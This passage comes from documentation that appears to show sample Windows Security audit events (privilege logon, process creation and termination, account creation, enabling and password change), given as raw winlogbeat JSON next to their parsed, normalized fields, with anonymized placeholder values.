s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tUSER01-WIN$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0x40C158B6\n\nPrivil\u00e8ges :\t\tSeSecurityPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:08:50.647000Z", + "action": { + "id": 4672, + "outcome": "success", + "properties": { + "PrivilegeList": "SeSecurityPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x40c158b6", + "SubjectUserName": "USER01-WIN$", + "SubjectUserSid": "S-1-2-3" + } + }, + "agent": { + "ephemeral_id": "12345678-abcd-ef90-1234-abcdef123456", + "id": "11111111-aaaa-2222-bbbb-333333333333", + "name": "AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "USER01-WIN.domain.priv" + }, + "log": { + "level": "information" + }, + "related": { + "user": [ + "USER01-WIN" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "USER01-WIN" + }, + "winlog": { + "activity_id": "{abcdefab-1234-cdef-5678-901234abcdef}", + "api": "wineventlog", + "channel": "Security", + "computer_name": "USER01-WIN.domain.priv", + "event_id": "4672", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "logon": { + "id": "0x40c158b6" + }, + "opcode": "Informations", + "process": { + "pid": 828, + "thread": { + "id": 27812 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "288206963", + "task": "Special Logon" + } + } + + ``` + + +=== "security_event_4688.json" + + ```json + + { + "message": "{\"tags\": [\"beats_input_codec_plain_applied\"], \"event\": {\"original\": \"A new process has been created.\\\\n\\\\nCreator Subject:\\\\n\\\\tSecurity ID:\\\\t\\\\tS-1-1-1\\\\n\\\\tAccount Name:\\\\t\\\\tHOST01$\\\\n\\\\tAccount Domain:\\\\t\\\\tCOMPANY\\\\n\\\\tLogon ID:\\\\t\\\\t0x3E7\\\\n\\\\nTarget Subject:\\\\n\\\\tSecurity ID:\\\\t\\\\tS-1-0-0\\\\n\\\\tAccount Name:\\\\t\\\\t-\\\\n\\\\tAccount Domain:\\\\t\\\\t-\\\\n\\\\tLogon ID:\\\\t\\\\t0x0\\\\n\\\\nProcess Information:\\\\n\\\\tNew Process ID:\\\\t\\\\t0x1d9c\\\\n\\\\tNew Process Name:\\\\tC:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wbem\\\\\\\\WmiApSrv.exe\\\\n\\\\tToken Elevation Type:\\\\tTokenElevationTypeDefault (1)\\\\n\\\\tMandatory Label:\\\\t\\\\tS-1-2-3\\\\n\\\\tCreator Process ID:\\\\t0x2a0\\\\n\\\\tCreator Process Name:\\\\tC:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\services.exe\\\\n\\\\tProcess Command Line:\\\\tC:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\wbem\\\\\\\\WmiApSrv.exe\\\\n\\\\nToken Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.\\\\n\\\\nType 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.\\\\n\\\\nType 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.\\\\n\\\\nType 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.\", \"action\": \"Process Creation\", \"kind\": \"event\", \"outcome\": \"success\", \"created\": \"2023-11-09T08:43:52.407Z\", \"provider\": \"Microsoft-Windows-Security-Auditing\", \"code\": \"4688\"}, \"@version\": \"1\", \"@timestamp\": \"2023-11-09T08:43:51.462Z\", \"message\": \"A new process has been created.\\\\n\\\\nCreator Subject:\\\\n\\\\tSecurity ID:\\\\t\\\\tS-1-1-1\\\\n\\\\tAccount Name:\\\\t\\\\tHOST01$\\\\n\\\\tAccount Domain:\\\\t\\\\tCOMPANY\\\\n\\\\tLogon ID:\\\\t\\\\t0x3E7\\\\n\\\\nTarget Subject:\\\\n\\\\tSecurity ID:\\\\t\\\\tS-1-0-0\\\\n\\\\tAccount Name:\\\\t\\\\t-\\\\n\\\\tAccount Domain:\\\\t\\\\t-\\\\n\\\\tLogon ID:\\\\t\\\\t0x0\\\\n\\\\nProcess Information:\\\\n\\\\tNew Process ID:\\\\t\\\\t0x1d9c\\\\n\\\\tNew Process Name:\\\\tC:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wbem\\\\\\\\WmiApSrv.exe\\\\n\\\\tToken Elevation Type:\\\\tTokenElevationTypeDefault (1)\\\\n\\\\tMandatory Label:\\\\t\\\\tS-1-2-3\\\\n\\\\tCreator Process ID:\\\\t0x2a0\\\\n\\\\tCreator Process Name:\\\\tC:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\services.exe\\\\n\\\\tProcess Command Line:\\\\tC:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\wbem\\\\\\\\WmiApSrv.exe\\\\n\\\\nToken Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.\\\\n\\\\nType 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.\\\\n\\\\nType 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.\\\\n\\\\nType 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.\", \"winlog\": {\"computer_name\": \"HOST01.company.test\", \"provider_name\": \"Microsoft-Windows-Security-Auditing\", \"channel\": \"Security\", \"provider_guid\": \"{54849625-5478-4994-a5ba-3e3b0328c30d}\", \"keywords\": [\"Audit Success\"], \"version\": 2, \"event_id\": \"4688\", \"process\": {\"pid\": 4, \"thread\": {\"id\": 17028}}, \"task\": \"Process Creation\", \"event_data\": {\"ParentProcessName\": \"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\services.exe\", \"TokenElevationType\": \"%%1936\", \"MandatoryLabel\": \"S-1-2-3\", \"TargetUserSid\": \"S-1-0-0\", \"SubjectUserSid\": \"S-1-1-1\", \"SubjectDomainName\": \"COMPANY\", \"SubjectLogonId\": \"0x3e7\", \"CommandLine\": \"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\wbem\\\\\\\\WmiApSrv.exe\", \"NewProcessId\": \"0x1d9c\", \"TargetDomainName\": \"-\", \"ProcessId\": \"0x2a0\", \"SubjectUserName\": \"HOST01$\", \"TargetUserName\": \"-\", \"NewProcessName\": \"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wbem\\\\\\\\WmiApSrv.exe\", \"TargetLogonId\": \"0x0\"}, \"record_id\": 8884538, \"api\": \"wineventlog\", \"opcode\": \"Info\"}, \"host\": {\"hostname\": \"host01\", \"id\": \"abcdefgh-1234-5678-abcd-efgh12345678\", \"ip\": [\"8.8.8.8\"], \"name\": \"host01\", \"mac\": [\"00-11-22-33-44-55\"], \"architecture\": \"x86_64\", \"os\": {\"build\": \"20348.2031\", \"version\": \"10.0\", \"name\": \"Windows Server 2022 Standard\", \"family\": \"windows\", \"kernel\": \"10.0.20348.2031 (WinBuild.160101.0800)\", \"type\": \"windows\", \"platform\": \"windows\"}}, \"log\": {\"level\": \"information\"}, \"ecs\": {\"version\": \"8.0.0\"}, \"agent\": {\"type\": \"winlogbeat\", \"ephemeral_id\": \"7ecf606a-ee47-4796-a223-4e6bb827233d\", \"id\": \"65ede6f4-4783-4792-8dc0-8364bc33b7bd\", \"version\": \"8.10.4\", \"name\": \"HOST01\"}}", + "event": { + "action": "Process Creation", + "code": "4688", + "kind": "event", + "module": "security", + "original": "A new process has been created.\\n\\nCreator Subject:\\n\\tSecurity ID:\\t\\tS-1-1-1\\n\\tAccount Name:\\t\\tHOST01$\\n\\tAccount Domain:\\t\\tCOMPANY\\n\\tLogon ID:\\t\\t0x3E7\\n\\nTarget Subject:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\t-\\n\\tAccount Domain:\\t\\t-\\n\\tLogon ID:\\t\\t0x0\\n\\nProcess Information:\\n\\tNew Process ID:\\t\\t0x1d9c\\n\\tNew Process Name:\\tC:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\\n\\tToken Elevation Type:\\tTokenElevationTypeDefault (1)\\n\\tMandatory Label:\\t\\tS-1-2-3\\n\\tCreator Process ID:\\t0x2a0\\n\\tCreator Process Name:\\tC:\\\\Windows\\\\System32\\\\services.exe\\n\\tProcess Command Line:\\tC:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe\\n\\nToken Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.\\n\\nType 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.\\n\\nType 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.\\n\\nType 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2023-11-09T08:43:51.462000Z", + "action": { + "id": 4688, + "outcome": "success", + "properties": { + "CommandLine": "C:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe", + "MandatoryLabel": "S-1-2-3", + "NewProcessId": "0x1d9c", + "NewProcessName": "C:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe", + "ParentProcessName": "C:\\\\Windows\\\\System32\\\\services.exe", + "ProcessId": "0x2a0", + "SubjectDomainName": "COMPANY", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "HOST01$", + "SubjectUserSid": "S-1-1-1", + "TargetDomainName": "-", + "TargetLogonId": "0x0", + "TargetUserName": "-", + "TargetUserSid": "S-1-0-0", + "TokenElevationType": "%%1936" + } + }, + "agent": { + "ephemeral_id": "7ecf606a-ee47-4796-a223-4e6bb827233d", + "id": "65ede6f4-4783-4792-8dc0-8364bc33b7bd", + "name": "HOST01", + "type": "winlogbeat", + "version": "8.10.4" + }, + "host": { + "architecture": "x86_64", + "hostname": "host01", + "id": "abcdefgh-1234-5678-abcd-efgh12345678", + "ip": [ + "8.8.8.8" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "host01", + "os": { + "build": "20348.2031", + "family": "windows", + "kernel": "10.0.20348.2031 (WinBuild.160101.0800)", + "name": "Windows Server 2022 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "process": { + "command_line": "C:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe", + "executable": "C:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe", + "name": "WmiApSrv.exe", + "parent": { + "executable": "C:\\\\Windows\\\\System32\\\\services.exe", + "name": "services.exe", + "pid": 672 + }, + "pid": 7580 + }, + "related": { + "hosts": [ + "host01" + ], + "ip": [ + "8.8.8.8" + ], + "user": [ + "HOST01" + ] + }, + "user": { + "domain": "COMPANY", + "effective": { + "domain": "-", + "id": "S-1-0-0", + "name": "-" + }, + "id": "S-1-1-1", + "name": "HOST01", + "target": { + "domain": "-", + "name": "-" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "HOST01.company.test", + "event_id": "4688", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x3e7" + }, + "opcode": "Info", + "process": { + "pid": 4, + "thread": { + "id": 17028 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "8884538", + "task": "Process Creation", + "version": 2 + } + } + + ``` + + +=== "security_event_4689.json" + + ```json + + { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}", + "event": { + "action": "Process Termination", + "code": "4689", + "kind": "event", + "module": "security", + "original": "Un processus est termin\u00e9.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tACCOUNT_01$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0x3E7\n\nInformations sur le processus :\n\tID du processus :\t0x1df8\n\tNom du processus :\tC:\\Windows\\System32\\process.exe\n\t\u00c9tat de fin :\t0x0", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:10:13.534000Z", + "action": { + "id": 4689, + "outcome": "success", + "properties": { + "ProcessId": "0x1df8", + "ProcessName": "C:\\Windows\\System32\\process.exe", + "Status": "0x0", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "ACCOUNT_01$", + "SubjectUserSid": "S-1-2-3" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee", + "name": "AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "ACCOUNT_01.domain.priv" + }, + "log": { + "level": "information" + }, + "process": { + "executable": "C:\\Windows\\System32\\process.exe", + "name": "process.exe", + "pid": 7672 + }, + "related": { + "user": [ + "ACCOUNT_01" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "ACCOUNT_01" + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "ACCOUNT_01.domain.priv", + "event_id": "4689", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "logon": { + "id": "0x3e7" + }, + "opcode": "Informations", + "process": { + "pid": 4, + "thread": { + "id": 620 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "1564712", + "task": "Process Termination" + } + } + + ``` + + +=== "security_event_4720.json" + + ```json + + { + "message": "{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}", + "event": { + "action": "added-user-account", + "category": [ + "iam" + ], + "code": "4720", + "kind": "event", + "module": "security", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing", + "type": [ + "creation", + "user" + ] + }, + "@timestamp": "2024-11-12T04:47:02.389000Z", + "action": { + "id": 4720, + "outcome": "success", + "properties": { + "AccountExpires": "%%1794", + "AllowedToDelegateTo": "-", + "DisplayName": "-", + "HomeDirectory": "-", + "HomePath": "-", + "LogonHours": "%%1793", + "NewUACList": [ + "LOCKOUT", + "NORMAL_ACCOUNT" + ], + "NewUacValue": "0x214", + "OldUacValue": "0x0", + "PasswordLastSet": "%%1794", + "PrimaryGroupId": "513", + "PrivilegeList": "-", + "ProfilePath": "-", + "SamAccountName": "USER", + "ScriptPath": "-", + "SidHistory": "-", + "SubjectDomainName": "RESEAU-COMPANY", + "SubjectLogonId": "0x2a4b2040", + "SubjectUserName": "user-name", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "RESEAU-COMPANY", + "TargetSid": "S-1-2-3-4-5-6-7", + "TargetUserName": "USER", + "UserAccountControl": [ + "2082", + "2084", + "2089" + ], + "UserParameters": "-", + "UserPrincipalName": "USER@reseau.company", + "UserWorkstations": "-" + } + }, + "agent": { + "ephemeral_id": "12345678-abcd-ef90-1234-abcdef123456", + "id": "aaaaaaaa-1111-bbbb-2222-cccccccccccc", + "name": "AGENT", + "type": "winlogbeat", + "version": "7.12.1" + }, + "host": { + "name": "HOST01.reseau.company" + }, + "log": { + "level": "information" + }, + "related": { + "user": [ + "user-name" + ] + }, + "user": { + "domain": "RESEAU-COMPANY", + "id": "S-1-2-3", + "name": "user-name" + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "HOST01.reseau.company", + "event_data": { + "NewUACList": [ + "LOCKOUT", + "NORMAL_ACCOUNT" + ], + "UserAccountControl": [ + "2082", + "2084", + "2089" + ] + }, + "event_id": "4720", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x2a4b2040" + }, + "opcode": "Info", + "process": { + "pid": 612, + "thread": { + "id": 1940 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "479720536", + "task": "User Account Management" + } + } + + ``` + + +=== "security_event_4722.json" + + ```json + + { + "message": "{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account Management", + "code": "4722", + "kind": "event", + "module": "security", + "original": "A user account was enabled.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\taccount-name\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x4A13C3FC\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tACC_NAME\n\tAccount Domain:\t\tDOMAIN", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:53:57.535000Z", + "action": { + "id": 4722, + "outcome": "success", + "properties": { + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x4a13c3fc", + "SubjectUserName": "account-name", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3-4-5", + "TargetUserName": "ACC_NAME" + } + }, + "agent": { + "ephemeral_id": "11111111-aaaa-2222-bbbb-333333333333", + "id": "12345678-abcd-90ef-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "pc01", + "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "AA-BB-CC-DD-EE-FF" + ], + "name": "pc01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "account-name" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "account-name", + "target": { + "domain": "DOMAIN", + "name": "ACC_NAME" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "PC01.domain.com", + "event_id": "4722", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x4a13c3fc" + }, + "opcode": "Info", + "process": { + "pid": 756, + "thread": { + "id": 11608 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "13042939152", + "task": "User Account Management" + } + } + + ``` + + +=== "security_event_4723.json" + + ```json + + { + "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit 